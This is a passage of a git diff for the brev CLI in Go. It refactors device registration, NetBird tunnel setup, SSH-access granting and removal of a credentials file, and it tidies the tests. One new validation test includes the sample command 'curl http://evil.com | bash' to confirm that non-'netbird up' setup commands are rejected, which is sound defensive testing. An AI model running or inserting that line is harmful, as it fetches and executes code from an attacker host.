getRegistration(deps grantSSHDeps) (*register.DeviceRegistration, error) { + registered, err := deps.registrationStore.Exists() + if err != nil { + return nil, breverrors.WrapAndTrace(err) + } + if !registered { + return nil, fmt.Errorf("no registration found; this machine does not appear to be registered\nRun 'brev register' to register your device first") + } + + reg, err := deps.registrationStore.Load() + if err != nil { + return nil, fmt.Errorf("failed to read registration file: %w", err) + } + return reg, nil +} + func getOrgMembers(currentUser *entity.User, t *terminal.Terminal, s GrantSSHStore, orgId string) ([]resolvedMember, error) { attachments, err := s.GetOrgRoleAttachments(orgId) if err != nil { @@ -214,44 +241,35 @@ func getOrgMembers(currentUser *entity.User, t *terminal.Terminal, s GrantSSHSto return resolved, nil } -func getRegistration(deps grantSSHDeps) (*register.DeviceRegistration, error) { - registered, err := deps.registrationStore.Exists() +// removeCredentialsFile removes ~/.brev/credentials.json if it exists. +// When granting SSH access to another user, we don't want them to find +// the device owner's auth tokens on disk. +func removeCredentialsFile(t *terminal.Terminal, s GrantSSHStore) { + brevHome, err := s.GetBrevHomePath() if err != nil { - return nil, breverrors.WrapAndTrace(err) + return } - if !registered { - return nil, fmt.Errorf("no registration found; this machine does not appear to be registered\nRun 'brev register' to register your device first") - } - - reg, err := deps.registrationStore.Load() - if err != nil { - return nil, fmt.Errorf("failed to read registration file: %w", err) + credsPath := filepath.Join(brevHome, "credentials.json") + if err := os.Remove(credsPath); err != nil { + if !os.IsNotExist(err) { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to remove credentials file: %v\n It is recommended to remove this file yourself so that this user does not see any sensitive tokens:\n rm %s", err, credsPath))) + } + return } - return reg, nil + t.Vprintf(" Removed %s\n", credsPath) } -// checkSSHEnabled verifies that SSH has been enabled on this device by checking -// if the current user's public key is present in authorized_keys. -func checkSSHEnabled(currentUserPubKey string) error { - currentUserPubKey = strings.TrimSpace(currentUserPubKey) - if currentUserPubKey == "" { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") - } - - u, err := user.Current() - if err != nil { - return fmt.Errorf("failed to determine current Linux user: %w", err) - } - - authKeysPath := filepath.Join(u.HomeDir, ".ssh", "authorized_keys") - existing, err := os.ReadFile(authKeysPath) // #nosec G304 - if err != nil { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") +func getSelectedUser(usersToSelect []string, selected string, orgMembers []resolvedMember) (*entity.User, error) { + selectedIdx := -1 + for i, userSelection := range usersToSelect { + if userSelection == selected { + selectedIdx = i + break + } } - - if !strings.Contains(string(existing), currentUserPubKey) { - return fmt.Errorf("SSH has not been enabled on this device. Run 'brev enable-ssh' first.") + if selectedIdx < 0 { + return nil, fmt.Errorf("selected item %q did not match any org member", selected) } - - return nil + selectedUser := orgMembers[selectedIdx].user + return selectedUser, nil } diff --git a/pkg/cmd/grantssh/grantssh_test.go b/pkg/cmd/grantssh/grantssh_test.go index 639a499cd..0dc3084e0 100644 --- a/pkg/cmd/grantssh/grantssh_test.go +++ b/pkg/cmd/grantssh/grantssh_test.go @@ -16,6 +16,7 @@ import ( "github.com/brevdev/brev-cli/pkg/cmd/register" "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" ) @@ -37,7 +38,7 @@ type mockNodeClientFactory struct { serverURL string } -func (m mockNodeClientFactory) NewNodeClient(provider register.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { +func (m mockNodeClientFactory) NewNodeClient(provider externalnode.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { return register.NewNodeServiceClient(provider, m.serverURL) } diff --git a/pkg/cmd/ls/ls.go b/pkg/cmd/ls/ls.go index 1424603c4..4ccae9098 100644 --- a/pkg/cmd/ls/ls.go +++ b/pkg/cmd/ls/ls.go @@ -11,6 +11,8 @@ import ( "connectrpc.com/connect" "github.com/brevdev/brev-cli/pkg/analytics" + "github.com/brevdev/brev-cli/pkg/externalnode" + "github.com/brevdev/brev-cli/pkg/cmd/cmderrors" "github.com/brevdev/brev-cli/pkg/cmd/completions" "github.com/brevdev/brev-cli/pkg/cmd/hello" @@ -763,15 +765,7 @@ func displayNodesTablePlain(nodes []*nodev1.ExternalNode) { func nodeConnectionStatus(n *nodev1.ExternalNode) string { ci := n.GetConnectivityInfo() if ci == nil { - return "UNKNOWN" - } - - switch ci.GetStatus() { - case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED: - return "CONNECTED" - case nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_DISCONNECTED: - return "DISCONNECTED" - default: - return "REGISTERED" + return "Unknown" } + return externalnode.FriendlyNetworkStatus(ci.GetStatus()) } diff --git a/pkg/cmd/register/registration_store.go b/pkg/cmd/register/device_registration_store.go similarity index 100% rename from pkg/cmd/register/registration_store.go rename to pkg/cmd/register/device_registration_store.go diff --git a/pkg/cmd/register/registration_store_test.go b/pkg/cmd/register/device_registration_store_test.go similarity index 100% rename from pkg/cmd/register/registration_store_test.go rename to pkg/cmd/register/device_registration_store_test.go diff --git a/pkg/cmd/register/hardware_test.go b/pkg/cmd/register/hardware_test.go index 929c79d39..3cb033c39 100644 --- a/pkg/cmd/register/hardware_test.go +++ b/pkg/cmd/register/hardware_test.go @@ -63,31 +63,34 @@ MemAvailable: 98765432 kB } func Test_parseOSReleaseContent(t *testing.T) { - content := `NAME="Ubuntu" -VERSION="24.04 LTS (Noble Numbat)" -ID=ubuntu -VERSION_ID="24.04" -PRETTY_NAME="Ubuntu 24.04 LTS" -` - name, version := parseOSReleaseContent(content) - if name != "Ubuntu" { - t.Errorf("expected Ubuntu, got %s", name) - } - if version != "24.04" { - t.Errorf("expected 24.04, got %s", version) + tests := []struct { + name string + input string + wantName string + wantVersion string + }{ + { + "Quoted", + "NAME=\"Ubuntu\"\nVERSION=\"24.04 LTS (Noble Numbat)\"\nID=ubuntu\nVERSION_ID=\"24.04\"\nPRETTY_NAME=\"Ubuntu 24.04 LTS\"\n", + "Ubuntu", "24.04", + }, + { + "Unquoted", + "NAME=Fedora\nVERSION_ID=39\n", + "Fedora", "39", + }, } -} -func Test_parseOSReleaseContent_Unquoted(t *testing.T) { - content := `NAME=Fedora -VERSION_ID=39 -` - name, version := parseOSReleaseContent(content) - if name != "Fedora" { - t.Errorf("expected Fedora, got %s", name) - } - if version != "39" { - t.Errorf("expected 39, got %s", version) + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + name, version := parseOSReleaseContent(tt.input) + if name != tt.wantName { + t.Errorf("name = %q, want %q", name, tt.wantName) + } + if version != tt.wantVersion { + t.Errorf("version = %q, want %q", version, tt.wantVersion) + } + }) } } @@ -280,20 +283,21 @@ NVIDIA A100, not-a-number } } -func Test_parseStorageOutput_Empty(t *testing.T) { - devices := parseStorageOutput("") - if len(devices) != 0 { - t.Errorf("expected 0 devices, got %d", len(devices)) +func Test_parseStorageOutput_NoValidDevices(t *testing.T) { + tests := []struct { + name string + input string + }{ + {"Empty", ""}, + {"NoDiskDevices", "sr0 1073741312 rom 1\nloop0 123456 loop 0\n"}, } -} - -func Test_parseStorageOutput_NoDiskDevices(t *testing.T) { - output := `sr0 1073741312 rom 1 -loop0 123456 loop 0 -` - devices := parseStorageOutput(output) - if len(devices) != 0 { - t.Errorf("expected 0 devices for non-disk entries, got %d", len(devices)) + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + devices := parseStorageOutput(tt.input) + if len(devices) != 0 { + t.Errorf("expected 0 devices, got %d", len(devices)) + } + }) } } diff --git a/pkg/cmd/register/netbird.go b/pkg/cmd/register/netbird.go index ad7652d37..51d1142a9 100644 --- a/pkg/cmd/register/netbird.go +++ b/pkg/cmd/register/netbird.go @@ -2,8 +2,8 @@ package register import ( "fmt" - "os" "os/exec" + "strings" ) // InstallNetbird installs NetBird if it is not already present. @@ -15,20 +15,20 @@ func InstallNetbird() error { script := `(curl -fsSL https://pkgs.netbird.io/install.sh | sh) || (curl -fsSL https://pkgs.netbird.io/install.sh | sh -s -- --update)` cmd := exec.Command("bash", "-c", script) // #nosec G204 - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - if err := cmd.Run(); err != nil { - return fmt.Errorf("failed to install NetBird: %w", err) + return fmt.Errorf("failed to install Brev tunnel: %w", err) } return nil } // runSetupCommand executes the setup command returned by the AddNode RPC. +// It validates that the command starts with "netbird up" as a basic guard +// against unexpected server responses. func runSetupCommand(script string) error { + if !strings.HasPrefix(strings.TrimSpace(script), "netbird up") { + return fmt.Errorf("unexpected setup command") + } cmd := exec.Command("bash", "-c", script) // #nosec G204 - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr if err := cmd.Run(); err != nil { return fmt.Errorf("setup command failed: %w", err) } @@ -62,11 +62,8 @@ sudo rm -rf /etc/netbird ` cmd := exec.Command("bash", "-c", script) // #nosec G204 - cmd.Stdout = os.Stdout - cmd.Stderr = os.Stderr - if err := cmd.Run(); err != nil { - return fmt.Errorf("failed to uninstall NetBird: %w", err) + return fmt.Errorf("failed to uninstall Brev tunnel: %w", err) } return nil } diff --git a/pkg/cmd/register/providers.go b/pkg/cmd/register/providers.go index 5d0c8d059..cabfa1c48 100644 --- a/pkg/cmd/register/providers.go +++ b/pkg/cmd/register/providers.go @@ -5,6 +5,7 @@ import ( nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" ) @@ -31,11 +32,11 @@ func (TerminalPrompter) Select(label string, items []string) string { }) } -// NetBirdManager handles NetBird installation and uninstallation. -type NetBirdManager struct{} +// Netbird handles NetBird installation and uninstallation. +type Netbird struct{} -func (NetBirdManager) Install() error { return InstallNetbird() } -func (NetBirdManager) Uninstall() error { return UninstallNetbird() } +func (Netbird) Install() error { return InstallNetbird() } +func (Netbird) Uninstall() error { return UninstallNetbird() } // ShellSetupRunner runs setup scripts via shell. type ShellSetupRunner struct{} @@ -45,6 +46,6 @@ func (ShellSetupRunner) RunSetup(script string) error { return runSetupCommand(s // DefaultNodeClientFactory creates real ConnectRPC clients. type DefaultNodeClientFactory struct{} -func (DefaultNodeClientFactory) NewNodeClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient { +func (DefaultNodeClientFactory) NewNodeClient(provider externalnode.TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient { return NewNodeServiceClient(provider, baseURL) } diff --git a/pkg/cmd/register/register.go b/pkg/cmd/register/register.go index 3e1e58f4e..f041df738 100644 --- a/pkg/cmd/register/register.go +++ b/pkg/cmd/register/register.go @@ -5,10 +5,11 @@ import ( "context" "fmt" "os" + "os/exec" "os/user" + "strings" "time" - nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" "connectrpc.com/connect" "github.com/google/uuid" @@ -16,6 +17,7 @@ import ( "github.com/brevdev/brev-cli/pkg/config" "github.com/brevdev/brev-cli/pkg/entity" breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" "github.com/spf13/cobra" @@ -40,19 +42,10 @@ func (r OSFileReader) ReadFile(path string) ([]byte, error) { return data, nil } -// PlatformChecker checks whether the current platform is supported. -type PlatformChecker interface { - IsCompatible() bool -} - -// Confirmer prompts for yes/no confirmation. -type Confirmer interface { - ConfirmYesNo(label string) bool -} - -// NetBirdInstaller installs the NetBird network agent. -type NetBirdInstaller interface { +// NetBirdManager installs and uninstalls the NetBird network agent. +type NetBirdManager interface { Install() error + Uninstall() error } // SetupRunner runs a setup script on the local machine. @@ -60,19 +53,14 @@ type SetupRunner interface { RunSetup(script string) error } -// NodeClientFactory creates ConnectRPC ExternalNodeService clients. -type NodeClientFactory interface { - NewNodeClient(provider TokenProvider, baseURL string) nodev1connect.ExternalNodeServiceClient -} - // registerDeps bundles the side-effecting dependencies of runRegister so they // can be replaced in tests. type registerDeps struct { - platform PlatformChecker - prompter Confirmer - netbird NetBirdInstaller + platform externalnode.PlatformChecker + prompter terminal.Confirmer + netbird NetBirdManager setupRunner SetupRunner - nodeClients NodeClientFactory + nodeClients externalnode.NodeClientFactory commandRunner CommandRunner fileReader FileReader registrationStore RegistrationStore @@ -82,7 +70,7 @@ func defaultRegisterDeps(brevHome string) registerDeps { return registerDeps{ platform: LinuxPlatform{}, prompter: TerminalPrompter{}, - netbird: NetBirdManager{}, + netbird: Netbird{}, setupRunner: ShellSetupRunner{}, nodeClients: DefaultNodeClientFactory{}, commandRunner: ExecCommandRunner{}, @@ -94,7 +82,7 @@ func defaultRegisterDeps(brevHome string) registerDeps { var ( registerLong = `Register your device with NVIDIA Brev -This command installs NetBird (network agent), and registers this machine with Brev.` +This command sets up network connectivity and registers this machine with Brev.` registerExample = ` brev register "My DGX Spark"` ) @@ -126,26 +114,37 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam return err } + alreadyRegistered, err := deps.registrationStore.Exists() + if err != nil { + return breverrors.WrapAndTrace(err) + } + if alreadyRegistered { + reg, loadErr := deps.registrationStore.Load() + if loadErr != nil { + return fmt.Errorf("this machine is already registered but the registration file could not be read: %w", loadErr) + } + return checkExistingRegistration(ctx, t, s, deps, reg) + } + brevUser, err := s.GetCurrentUser() if err != nil { return breverrors.WrapAndTrace(err) } - u, err := user.Current() + osUser, err := user.Current() if err != nil { return fmt.Errorf("failed to determine current Linux user: %w", err) } - linuxUser := u.Username t.Vprint("") t.Vprint(t.Green("Registering your device with Brev")) t.Vprint("") t.Vprintf(" Name: %s\n", t.Yellow(name)) t.Vprintf(" Organization: %s\n", org.Name) - t.Vprintf(" Registering for Linux user: %s\n", linuxUser) + t.Vprintf(" Registering for Linux user: %s\n", osUser.Username) t.Vprint("") t.Vprint("This will perform the following steps:") - t.Vprint(" 1. Install NetBird") + t.Vprint(" 1. Set up Brev tunnel") t.Vprint(" 2. Collect hardware profile") t.Vprint(" 3. Register this machine with Brev") t.Vprint("") @@ -156,11 +155,11 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam } t.Vprint("") - t.Vprint(t.Yellow("[Step 1/3] Installing NetBird...")) + t.Vprint(t.Yellow("[Step 1/3] Setting up Brev tunnel...")) if err := deps.netbird.Install(); err != nil { - return fmt.Errorf("NetBird installation failed: %w", err) + return fmt.Errorf("brev tunnel setup failed: %w", err) } - t.Vprint(t.Green(" NetBird installed successfully.")) + t.Vprint(t.Green(" Brev tunnel ready.")) t.Vprint("") t.Vprint(t.Yellow("[Step 2/3] Collecting hardware profile...")) @@ -204,48 +203,66 @@ func runRegister(ctx context.Context, t *terminal.Terminal, s RegisterStore, nam t.Vprint(t.Green(" Registration complete.")) - if ci := node.GetConnectivityInfo(); ci != nil { - if cmd := ci.GetRegistrationCommand(); cmd != "" { - if err := deps.setupRunner.RunSetup(cmd); err != nil { - t.Vprintf(" Warning: setup command failed: %v\n", err) - } + ci := node.GetConnectivityInfo() + if ci == nil || ci.GetRegistrationCommand() == "" { + t.Vprintf(" %s\n", t.Yellow("Warning: Brev tunnel setup failed, please try again.")) + } else { + if err := deps.setupRunner.RunSetup(ci.GetRegistrationCommand()); err != nil { + t.Vprintf(" Warning: setup command failed: %v\n", err) + } else { + // netbird up reconfigures network routes; give them a moment + // to settle before making further RPC calls. + time.Sleep(2 * time.Second) } } if deps.prompter.ConfirmYesNo("Would you like to enable SSH access to this device?") { - grantSSHAccess(ctx, t, deps, s, reg, brevUser, u) + grantSSHAccess(ctx, t, deps, s, reg, brevUser, osUser) } return nil } -func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps, tokenProvider TokenProvider, reg *DeviceRegistration, brevUser *entity.User, u *user.User) { +func grantSSHAccess(ctx context.Context, t *terminal.Terminal, deps registerDeps, tokenProvider externalnode.TokenProvider, reg *DeviceRegistration, brevUser *entity.User, osUser *user.User) { t.Vprint("") t.Vprint(t.Green("Enabling SSH access on this device")) t.Vprint("") t.Vprintf(" Node: %s (%s)\n", reg.DisplayName, reg.ExternalNodeID) t.Vprintf(" Brev user: %s\n", brevUser.ID) - t.Vprintf(" Linux user: %s\n", u.Username) + t.Vprintf(" Linux user: %s\n", osUser.Username) t.Vprint("") - client := deps.nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) - if _, err := client.GrantNodeSSHAccess(ctx, connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ - ExternalNodeId: reg.ExternalNodeID, - UserId: brevUser.ID, - LinuxUser: u.Username, - })); err != nil { - t.Vprintf(" Warning: failed to enable SSH: %v\n", err) - return - } - if brevUser.PublicKey != "" { - if err := InstallAuthorizedKey(u, brevUser.PublicKey); err != nil { + if err := InstallAuthorizedKey(osUser, brevUser.PublicKey); err != nil { t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to install SSH public key: %v", err))) } else { t.Vprint(" Brev public key added to authorized_keys.") } } + client := deps.nodeClients.NewNodeClient(tokenProvider, config.GlobalConfig.GetBrevPublicAPIURL()) + req := connect.NewRequest(&nodev1.GrantNodeSSHAccessRequest{ + ExternalNodeId: reg.ExternalNodeID, + UserId: brevUser.ID, + LinuxUser: osUser.Username, + }) + + _, err := client.GrantNodeSSHAccess(ctx, req) + if err != nil { + t.Vprint(" Retrying in 3 seconds...") + time.Sleep(3 * time.Second) + _, err = client.GrantNodeSSHAccess(ctx, req) + } + if err != nil { + t.Vprintf(" Warning: failed to enable SSH: %v\n", err) + if brevUser.PublicKey != "" { + if rerr := RemoveAuthorizedKey(osUser, brevUser.PublicKey); rerr != nil { + t.Vprintf(" Warning: failed to remove SSH key after failed grant: %v\n", rerr) + } + } + return + } + t.Vprint(t.Green(fmt.Sprintf("SSH access enabled. You can now SSH to this device via: brev shell %s", reg.DisplayName))) } @@ -267,12 +284,92 @@ func getOrgToRegisterFor(deps registerDeps, s RegisterStore) (*entity.Organizati return nil, fmt.Errorf("no organization found; please create or join an organization first") } - alreadyRegistered, err := deps.registrationStore.Exists() + return org, nil +} + +// checkExistingRegistration verifies connectivity for an already-registered node. +// It calls GetNode to check the server-side NetworkMemberStatus and ensures the +// local netbird service is running, starting it if necessary. Returns nil if +// the node is healthy, or an error describing what's wrong. +func checkExistingRegistration(ctx context.Context, t *terminal.Terminal, s RegisterStore, deps registerDeps, reg *DeviceRegistration) error { + t.Vprint("") + t.Vprintf(" This machine is already registered as %s (%s).\n", reg.DisplayName, reg.ExternalNodeID) + t.Vprint(" Checking connectivity...") + t.Vprint("") + + // Check server-side connectivity status via GetNode. + client := deps.nodeClients.NewNodeClient(s, config.GlobalConfig.GetBrevPublicAPIURL()) + resp, err := client.GetNode(ctx, connect.NewRequest(&nodev1.GetNodeRequest{ + ExternalNodeId: reg.ExternalNodeID, + OrganizationId: reg.OrgID, + })) if err != nil { - return nil, breverrors.WrapAndTrace(err) + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: could not fetch node status: %v", err))) + } else { + ci := resp.Msg.GetExternalNode().GetConnectivityInfo() + if ci != nil && ci.GetStatus() == nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED { + t.Vprint(t.Green(" Node is connected.")) + t.Vprint("") + t.Vprint(" Run 'brev deregister' first if you want to re-register.") + return nil + } + t.Vprintf(" Node status: %s\n", externalnode.FriendlyNetworkStatus(ci.GetStatus())) } - if alreadyRegistered { - return nil, fmt.Errorf("this machine is already registered; run 'brev deregister' first to re-register") + + // Check local netbird service and start it if down. + t.Vprint(" Checking local Brev tunnel...") + if ensureNetbirdRunning(t) { + t.Vprint(t.Green(" Brev tunnel is running.")) } - return org, nil + + t.Vprint("") + t.Vprint(" Run 'brev deregister' first if you want to re-register.") + return nil +} + +// ensureNetbirdRunning checks if the netbird systemd service is active and +// attempts to start it if it is not. It also checks the netbird peer +// connection status and runs "netbird up" if the peer is disconnected. +// Returns true if the service is running and connected after the check. +func ensureNetbirdRunning(t *terminal.Terminal) bool { + out, err := exec.Command("systemctl", "is-active", "netbird").Output() //nolint:gosec // fixed service name + if err != nil || strings.TrimSpace(string(out)) != "active" { + t.Vprintf(" %s\n", t.Yellow("Brev tunnel service is not running. Attempting to start...")) + if startErr := exec.Command("sudo", "systemctl", "start", "netbird").Run(); startErr != nil { //nolint:gosec // fixed service name + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to start Brev tunnel service: %v", startErr))) + return false + } + t.Vprint(t.Green(" Brev tunnel service started.")) + } + + // Service is running — now check peer connection status. + statusOut, err := exec.Command("netbird", "status").Output() //nolint:gosec // fixed command + if err != nil { + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: could not check Brev tunnel status: %v", err))) + return true // service is running, just can't confirm peer status + } + + if netbirdManagementConnected(string(statusOut)) { + return true + } + + t.Vprintf(" %s\n", t.Yellow("Brev tunnel peer is disconnected. Reconnecting...")) + if upErr := exec.Command("sudo", "netbird", "up").Run(); upErr != nil { //nolint:gosec // fixed command + t.Vprintf(" %s\n", t.Yellow(fmt.Sprintf("Warning: failed to reconnect Brev tunnel: %v", upErr))) + return false + } + t.Vprint(t.Green(" Brev tunnel reconnected.")) + return true +} + +// netbirdManagementConnected parses "netbird status" output and returns true +// when the Management line reports "Connected". +func netbirdManagementConnected(statusOutput string) bool { + for _, line := range strings.Split(statusOutput, "\n") { + line = strings.TrimSpace(line) + if strings.HasPrefix(line, "Management:") { + return strings.TrimSpace(strings.TrimPrefix(line, "Management:")) == "Connected" + } + } + return false } diff --git a/pkg/cmd/register/register_test.go b/pkg/cmd/register/register_test.go index 473acc401..5aad1b80a 100644 --- a/pkg/cmd/register/register_test.go +++ b/pkg/cmd/register/register_test.go @@ -4,6 +4,7 @@ import ( "context" "fmt" "net/http/httptest" + "strings" "testing" nodev1connect "buf.build/gen/go/brevdev/devplane/connectrpc/go/devplaneapi/v1/devplaneapiv1connect" @@ -11,6 +12,7 @@ import ( "connectrpc.com/connect" "github.com/brevdev/brev-cli/pkg/entity" + "github.com/brevdev/brev-cli/pkg/externalnode" "github.com/brevdev/brev-cli/pkg/terminal" ) @@ -73,9 +75,10 @@ type mockConfirmer struct{ confirm bool } func (m mockConfirmer) ConfirmYesNo(_ string) bool { return m.confirm } -type mockNetBirdInstaller struct{ err error } +type mockNetBirdManager struct{ err error } -func (m mockNetBirdInstaller) Install() error { return m.err } +func (m mockNetBirdManager) Install() error { return m.err } +func (m mockNetBirdManager) Uninstall() error { return m.err } type mockSetupRunner struct { called bool @@ -93,7 +96,7 @@ type mockNodeClientFactory struct { serverURL string } -func (m mockNodeClientFactory) NewNodeClient(provider TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { +func (m mockNodeClientFactory) NewNodeClient(provider externalnode.TokenProvider, _ string) nodev1connect.ExternalNodeServiceClient { return NewNodeServiceClient(provider, m.serverURL) } @@ -108,7 +111,7 @@ func testRegisterDeps(t *testing.T, svc *fakeNodeService, regStore RegistrationS return registerDeps{ platform: mockPlatform{compatible: true}, prompter: mockConfirmer{confirm: true}, - netbird: mockNetBirdInstaller{}, + netbird: mockNetBirdManager{}, setupRunner: &mockSetupRunner{}, nodeClients: mockNodeClientFactory{serverURL: server.URL}, commandRunner: &mockCommandRunner{ @@ -235,28 +238,86 @@ func Test_runRegister_UserCancels(t *testing.T) { } func Test_runRegister_AlreadyRegistered(t *testing.T) { - regStore := &mockRegistrationStore{ - reg: &DeviceRegistration{ - ExternalNodeID: "unode_existing", - DisplayName: "Existing", + tests := []struct { + name string + getNodeFn func(*nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) + }{ + { + name: "Connected", + getNodeFn: func(req *nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) { + return &nodev1.GetNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: req.GetExternalNodeId(), + ConnectivityInfo: &nodev1.ConnectivityInfo{ + Status: nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_CONNECTED, + }, + }, + }, nil + }, + }, + { + name: "Disconnected", + getNodeFn: func(req *nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) { + return &nodev1.GetNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: req.GetExternalNodeId(), + ConnectivityInfo: &nodev1.ConnectivityInfo{ + Status: nodev1.NetworkMemberStatus_NETWORK_MEMBER_STATUS_DISCONNECTED, + }, + }, + }, nil + }, + }, + { + name: "GetNodeFails", + getNodeFn: func(_ *nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) { + return nil, connect.NewError(connect.CodeInternal, nil) + }, + }, + { + name: "NilConnectivityInfo", + getNodeFn: func(req *nodev1.GetNodeRequest) (*nodev1.GetNodeResponse, error) { + return &nodev1.GetNodeResponse{ + ExternalNode: &nodev1.ExternalNode{ + ExternalNodeId: req.GetExternalNodeId(), + }, + }, nil + }, }, } - store := &mockRegisterStore{ - user: &entity.User{ID: "user_1"}, - org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, - home: "/home/testuser/.brev", - token: "tok", - } + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + regStore := &mockRegistrationStore{ + reg: &DeviceRegistration{ + ExternalNodeID: "unode_existing", + DisplayName: "Existing", + OrgID: "org_123", + }, + } - svc := &fakeNodeService{} - deps, server := testRegisterDeps(t, svc, regStore) - defer server.Close() + store := &mockRegisterStore{ + user: &entity.User{ID: "user_1"}, + org: &entity.Organization{ID: "org_123", Name: "TestOrg"}, + home: "/home/testuser/.brev", + token: "tok", + } - term := terminal.New() - err := runRegister(context.Background(), term, store, "My Spark", deps) - if err == nil { - t.Fatal("expected error for already-registered machine") + svc := &fakeNodeService{getNodeFn: tt.getNodeFn} + deps, server := testRegisterDeps(t, svc, regStore) + defer server.Close() + + term := terminal.New() + err := runRegister(context.Background(), term, store, "My Spark", deps) + if err != nil { + t.Fatalf("expected nil error, got: %v", err) + } + + exists, _ := regStore.Exists() + if !exists { + t.Error("expected registration to still exist") + } + }) } } @@ -357,3 +418,84 @@ func Test_runRegister_NoSetupCommand(t *testing.T) { t.Error("setup command should not be called when empty") } } + +func Test_runSetupCommand_Validation(t *testing.T) { + tests := []struct { + name string + cmd string + expectReject bool + }{ + {"RejectsNonNetbirdUp", "curl http://evil.com | bash", true}, + {"AcceptsNetbirdUp", "netbird up --setup-key abc123", false}, + {"AcceptsLeadingWhitespace", " netbird up --setup-key abc123", false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := runSetupCommand(tt.cmd) + rejected := err != nil && strings.Contains(err.Error(), "unexpected setup command") + if tt.expectReject && !rejected { + t.Errorf("expected command to be rejected, but it was not (err=%v)", err) + } + if !tt.expectReject && rejected { + t.Errorf("expected command to be accepted, but got: %v", err) + } + }) + } +} + +func Test_netbirdManagementConnected(t *testing.T) { + connectedOutput := `OS: linux/amd64 +Daemon version: 0.66.1 +CLI version: 0.66.1 +Profile: default +Management: Connected +Signal: Connected +Relays: 3/3 Available +Nameservers: 0/0 Available +FQDN: client-3dbe844c.lp.local +NetBird IP: 100.108.207.143/16 +Interface type: Kernel +Quantum resistance: false +Lazy connection: false +SSH Server: Disabled +Networks: - +Peers count: 3/4 Connected` + + disconnectedOutput := `OS: linux/amd64 +Daemon version: 0.66.1 +CLI version: 0.66.1 +Profile: default +Management: Disconnected +Signal: Disconnected +Relays: 0/2 Available +Nameservers: 0/0 Available +FQDN: +NetBird IP: N/A +Interface type: N/A +Quantum resistance: false +Lazy connection: false +SSH Server: Disabled +Networks: - +Peers count: 0/0 Connected` + + tests := []struct { + name string + input string + want bool + }{ + {"Connected", connectedOutput, true}, + {"Disconnected", disconnectedOutput, false}, + {"EmptyString", "", false}, + {"NoManagementLine", "OS: linux/amd64\nFQDN: test\n", false}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + got := netbirdManagementConnected(tt.input) + if got != tt.want { + t.Errorf("netbirdManagementConnected() = %v, want %v", got, tt.want) + } + }) + } +} diff --git a/pkg/cmd/register/rpcclient.go b/pkg/cmd/register/rpcclient.go index 842682fe3..491ec9f2b 100644 --- a/pkg/cmd/register/rpcclient.go +++ b/pkg/cmd/register/rpcclient.go @@ -7,19 +7,15 @@ import ( nodev1 "buf.build/gen/go/brevdev/devplane/protocolbuffers/go/devplaneapi/v1" breverrors "github.com/brevdev/brev-cli/pkg/errors" + "github.com/brevdev/brev-cli/pkg/externalnode" ) -// TokenProvider abstracts access token retrieval for the HTTP transport. -type TokenProvider interface { - GetAccessToken() (string, error) -} - // bearerTokenTransport injects a Bearer token into every request. // We use a custom RoundTripper instead of setting headers on individual // client.Do() calls because ConnectRPC owns the HTTP requests internally — // this is the only hook we have to add auth headers. type bearerTokenTransport struct { - provider TokenProvider + provider externalnode.TokenProvider base http.RoundTripper } @@ -39,7 +35,7 @@ func (t *bearerTokenTransport) RoundTrip(req *http.Request) (*http.Response, err // newAuthenticatedHTTPClient creates an http.Client that injects the bearer token // from the given provider on every request. -func newAuthenticatedHTTPClient(provider TokenProvider) *http.Client { +func newAuthenticatedHTTPClient(provider externalnode.TokenProvider) *http.Client { return &http.Client{ Transport: &bearerTokenTransport{ provider: provider, @@ -50,7 +46,7 @@ func newAuthenticatedHTTPClient(provider TokenProvider) *http.Client { // NewNodeServiceClient creates a ConnectRPC ExternalNodeServiceClient using the // given token provider for authentication. -func NewNodeServiceClient(provider TokenProvider, baseURL string) 